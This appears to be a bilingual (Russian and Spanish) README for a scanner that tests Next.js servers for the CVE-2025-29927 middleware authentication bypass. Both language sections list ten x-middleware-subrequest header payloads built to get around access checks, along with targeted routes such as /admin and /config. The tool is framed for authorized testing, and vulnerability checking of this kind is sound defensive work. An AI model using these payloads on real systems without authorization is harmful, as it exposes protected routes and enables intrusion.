
Этот скрипт проверяет уязвимость CVE-2025-29927 на серверах Next.js, тестируя множество нагрузок в заголовке x-middleware-subrequest для обнаружения несанкционированного доступа.
CVE-2025-29927 Проверщик
📌 Введение
Этот скрипт проверяет уязвимость CVE-2025-29927 в серверах Next.js, тестируя несколько payload'ов в заголовке x-middleware-subrequest для обнаружения несанкционированного доступа.
❓ Что такое CVE-2025-29927?
CVE-2025-29927 — это уязвимость, позволяющая обойти ограничения безопасности в Next.js, предоставляя доступ к чувствительным маршрутам без аутентификации.
⚙️ Как работает скрипт
🔹 1. Импорт библиотек
Скрипт использует:
🛠️ argparse — для обработки аргументов.
🌐 requests — для отправки HTTP-запросов.
⏳ time — для пауз между тестами.
🎨 colorama — для форматирования вывода в консоли с цветами.
🔹 2. Список Payload'ов
Скрипт тестирует несколько payload'ов в x-middleware-subrequest, разработанных для обхода ограничений безопасности. Пример:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Чувствительные маршруты
Скрипт анализирует ответы на наличие таких путей, как:
/admin, /dashboard, /settings, /private, /config
🔹 4. Процесс сканирования
✅ Отображает баннер в консоли.✅ Отправляет HTTP-запросы с различными payload'ами.✅ Проверяет, использует ли сервер Next.js.✅ Обнаруживает доступ к чувствительным маршрутам и сообщает об уязвимостях.
🔹 5. Обработка ошибок
Скрипт обрабатывает исключения, чтобы предотвратить прерывания из-за сбоев соединения.
🚀 Пример использования
Запустите скрипт с помощью:
python script.py -t https://example.com/api/auth
📢 Отказ от ответственности
Этот инструмент предназначен только для этического тестирования и авторизованного использования. Несанкционированное использование против систем третьих лиц незаконно.
===================ESPAÑOL===================
CVE-2025-29927 Checker
📌 Introducción
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples payloads en el encabezado x-middleware-subrequest para detectar accesos no autorizados.
❓ ¿Qué es CVE-2025-29927?
CVE-2025-29927 es una vulnerabilidad que permite eludir restricciones de seguridad en Next.js, otorgando acceso a rutas sensibles sin autenticación.
⚙️ Cómo Funciona el Script
🔹 1. Importación de Librerías
El script utiliza:
🛠️ argparse - para el manejo de argumentos.
🌐 requests - para enviar solicitudes HTTP.
⏳ time - para pausas entre pruebas.
🎨 colorama - para formatear la salida en la consola con colores.
🔹 2. Lista de Payloads
El script prueba múltiples payloads en x-middleware-subrequest, diseñados para evadir restricciones de seguridad. Ejemplo:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Rutas Sensibles
El script analiza las respuestas en busca de rutas como:
/admin, /dashboard, /settings, /private, /config
🔹 4. Proceso de Escaneo
✅ Muestra un banner en la consola.✅ Envía solicitudes HTTP con diferentes payloads.✅ Verifica si el servidor usa Next.js.✅ Detecta accesos a rutas sensibles e informa vulnerabilidades.
🔹 5. Manejo de Errores
El script maneja excepciones para evitar interrupciones debido a fallos de conexión.
🚀 Ejemplo de Uso
Ejecutar el script con:
python script.py -t https://example.com/api/auth
📢 Aviso Legal
Esta herramienta es para pruebas éticas y uso autorizado únicamente. El uso no autorizado en sistemas de terceros es ilegal.